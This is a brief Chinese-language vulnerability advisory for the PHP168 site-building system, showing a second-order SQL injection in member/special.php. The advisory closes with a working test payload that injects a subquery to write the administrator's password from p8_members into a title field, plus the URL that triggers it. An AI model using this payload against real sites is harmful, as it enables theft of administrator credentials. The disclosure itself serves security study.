PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用。

在文件member/ special.php中:
elseif($job=="show_iframe"){   //第126行
$rsdb=$db->get_one("SELECT * FROM {$pre}special WHERE uid='$lfjuid' AND id='$id'");
……
if($act=="del"&&$aid)        //第155行
	{
		$detail=explode(",",$rsdb[aids]);
		foreach( $detail AS $key=>$value){
			if($value==$aid){
				unset($detail[$key]);
			}
		}
		$rsdb[aids]=$string=implode(",",$detail);
		$db->query("UPDATE {$pre}special SET aids='$string' WHERE uid='$lfjuid' AND id='$id'");
$rsdb[aids]直接从数据库中读出,没有经过任何验证放入sql语句导致注入漏洞的产生
测试方法:
第一:创建文集,本地提交。Aid= a',title=(select password from p8_members where uid=1) where fid=2#
第二:http://ssvdb.com/member/special.php?job=show_iframe&act=del&id=1&aid=1